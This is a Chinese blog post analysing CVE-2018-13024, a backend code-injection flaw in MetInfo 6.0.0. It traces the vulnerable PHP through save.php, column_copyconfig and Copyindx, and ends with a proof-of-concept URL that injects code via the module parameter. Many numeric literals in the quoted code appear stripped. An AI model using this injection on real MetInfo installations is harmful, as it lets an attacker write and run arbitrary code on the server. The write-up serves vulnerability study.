Metinfo 6.0.0 后台getshell 漏洞分析 CVE-2018-13024
Metinfo 6.0.0 后台getshell 漏洞分析 CVE-2018-13024
用户5878089
发布于 2019-07-25 16:30:08
发布于 2019-07-25 16:30:08
前言
最近看代码看的头疼,主要是想通过代码审计来提高自己对一些cms模块设计的理解,然后提高自己阅读代码的速度。 只是菜?一个,大牛不要喷我。 metinfo 6.0.0 有很多漏洞,但是从官网上下载的版本很多漏洞都已经修复了,不存在了,所以要是想复现漏洞的话,需要从其他地方下载源码文件,我这的源码是从CSDN找到的。
漏洞分析
从零开始分析一下漏洞的调用栈:
漏洞的触发点在:
admin/column/save.php
第32行
<?php
# MetInfo Enterprise Content Management System
# Copyright (C) MetInfo Co.,Ltd (http://www.metinfo.cn). All rights reserved.
require_once '../login/login_check.php';
require_once 'global.func.php';
if($action=="editor"){
if($name=='')metsave('-1',$lang_js11);
if($if_in== and $out_url=='' and $module<)metsave('-1',$lang_modOuturl);
if($module== &&$isshow== && !($met_class2[$id]||$met_class3[$id]))metsave('-1',$lang_columnerr8);
$filename=namefilter($filename);
$filenameold=namefilter($filenameold);
$indeximg =$metadmin[categorymarkimage]?$indeximg:'';
$columnimg=$metadmin[categoryimage]?$columnimg:'';
if($new_windows==){
$new_windows=null;
}
if($new_windows==){
$new_windows="target=''_blank''";
}
if($if_in==){
if($filename!='' && $filename!=$filenameold){
$filenameok = $db->get_one("SELECT * FROM {$met_column} WHERE filename='{$filename}' and foldername='$foldername' and id!='$id'");
if($filenameok)metsave('-1',$lang_modFilenameok);
if(is_numeric($filename) && $filename!=$id && $met_pseudo){
$filenameok1 = $db->get_one("SELECT * FROM {$met_column} WHERE id='{$filename}' and foldername='$foldername'");
if($filenameok1)metsave('-1',$lang_jsx30);
}
}
$filedir="../../".$foldername;
if(!file_exists($filedir))@mkdir($filedir,);
if(!file_exists($filedir))metsave('-1',$lang_modFiledir);
column_copyconfig($foldername,$module,$id);
其中又一个
column_copyconfig($foldername,$module,$id);
跟进:
admin\column\global.func.php
<?php
# MetInfo Enterprise Content Management System
# Copyright (C) MetInfo Co.,Ltd (http://www.metinfo.cn). All rights reserved.
function column_copyconfig($foldername,$module,$id){
global $anyid,$lang_columntip13,$lang,$db,$met_column;
switch($module){
case :
$indexaddress ="../about/index.php";
$newfile =ROOTPATH.$foldername."/show.php";
$address ="../about/show.php";
Copyfile($address,$newfile);
break;
case :
$indexaddress ="../news/index.php";
$newfile =ROOTPATH.$foldername."/news.php";
$address ="../news/news.php";
Copyfile($address,$newfile);
$newfile =ROOTPATH.$foldername."/shownews.php";
$address ="../news/shownews.php";
Copyfile($address,$newfile);
break;
case :
$indexaddress ="../product/index.php";
$newfile =ROOTPATH.$foldername."/product.php";
$address ="../product/product.php";
Copyfile($address,$newfile);
$newfile =ROOTPATH.$foldername."/showproduct.php";
$address ="../product/showproduct.php";
Copyfile($address,$newfile);
break;
case :
$indexaddress ="../download/index.php";
$newfile =ROOTPATH.$foldername."/download.php";
$address ="../download/download.php";
Copyfile($address,$newfile);
$newfile =ROOTPATH.$foldername."/showdownload.php";
$address ="../download/showdownload.php";
Copyfile($address,$newfile);
$newfile =ROOTPATH.$foldername."/down.php";
$address ="../download/down.php";
Copyfile($address,$newfile);
break;
case :
$indexaddress ="../img/index.php";
$newfile =ROOTPATH.$foldername."/img.php";
$address ="../img/img.php";
Copyfile($address,$newfile);
$newfile =ROOTPATH.$foldername."/showimg.php";
$address ="../img/showimg.php";
Copyfile($address,$newfile);
break;
case :
$array[][]='met_fd_time';
$array[][]='120';
$array[][]='met_fd_word';
$array[][]='';
$array[][]='met_fd_email';
$array[][]='0';
$array[][]='met_fd_type';
$array[][]='1';
$array[][]='met_fd_to';
$array[][]='';
$array[][]='met_fd_back';
$array[][]='0';
$array[][]='met_fd_title';
$array[][]='';
$array[][]='met_fd_content';
$array[][]='';
$array[][]='met_fd_ok';
$array[][]='1';
$array[][]='met_fd_sms_back';
$array[][]='';
$array[][]='met_fd_sms_content';
$array[][]='';
$array[][]='met_fd_sms_dell';
$array[][]='';
$array[][]='met_message_fd_class';
$array[][]='';
$array[][]='met_message_fd_content';
$array[][]='';
$array[][]='met_message_fd_email';
$array[][]='';
$array[][]='met_message_fd_sms';
$array[][]='';
verbconfig($array,$id);
break;
case :
$indexaddress ="../feedback/index.php";
$newfile =ROOTPATH.$foldername."/uploadfile_save.php";
$address ="../feedback/uploadfile_save.php";
Copyfile($address,$newfile);
$array[][]='met_fd_time';
$array[][]='120';
$array[][]='met_fd_word';
$array[][]='';
$array[][]='met_fd_type';
$array[][]='1';
$array[][]='met_fd_to';
$array[][]='';
$array[][]='met_fd_back';
$array[][]='0';
$array[][]='met_fd_email';
$array[][]='1';
$array[][]='met_fd_title';
$array[][]='';
$array[][]='met_fd_content';
$array[][]='';
$array[][]='met_fdtable';
$fd_title=$db->get_one("SELECT * FROM $met_column WHERE id='$id'");
$array[][]=$fd_title['name'];
$array[][]='met_fd_class';
$array[][]='1';
$array[][]='met_fd_ok';
$array[][]='1';
$array[][]='met_fd_sms_back';
$array[][]='';
$array[][]='met_fd_sms_content';
$array[][]='';
$array[][]='met_fd_sms_dell';
$array[][]='';
verbconfig($array,$id);
break;
}
Copyindx(ROOTPATH.$foldername.'/index.php',$module);
}
# This program is an open source system, commercial use, please consciously to purchase commercial license.
# Copyright (C) MetInfo Co., Ltd. (http://www.metinfo.cn). All rights reserved.
?>
中间的switch部分可以跳过,可以直接来到Copyindx函数,这是个文件备份写入的函数
跟进这个函数,大约在\admin\include\global.func.php884行
/*复制首页*/
function Copyindx($newindx,$type){
if(!file_exists($newindx)){
$oldcont ="<?php\n# MetInfo Enterprise Content Management System \n# Copyright (C) MetInfo Co.,Ltd (http://www.metinfo.cn). All rights reserved. \n\$filpy = basename(dirname(__FILE__));\n\$fmodule=$type;\nrequire_once '../include/module.php'; \nrequire_once \$module; \n# This program is an open source system, commercial use, please consciously to purchase commercial license.\n# Copyright (C) MetInfo Co., Ltd. (http://www.metinfo.cn). All rights reserved.\n?>";
$fp = fopen($newindx,w);
fputs($fp, $oldcont);
fclose($fp);
}
}
其中$fmodule=$type 变量没有经过任何过滤,直接输出,漏洞的核心就在这里。
再来看看传递变量的方式:
admin\include\common.inc.php 就可以通过传入get参数,覆盖$module变量,导致任意文件写入
foreach(array('_COOKIE', '_POST', '_GET') as $_request) {
foreach($$_request as $_key => $_value) {
$_key{} != '_' && $$_key = daddslashes($_value,,,);
$_M['form'][$_key]=daddslashes($_value,,,);
}
}
poc
http://localhost/admin/column/save.php?name=1212121&action=editor&foldername=upload&module=22;phpinfo();/*
访问之后 直接访问http://localhost/upload/index.php
本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2019-01-25,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读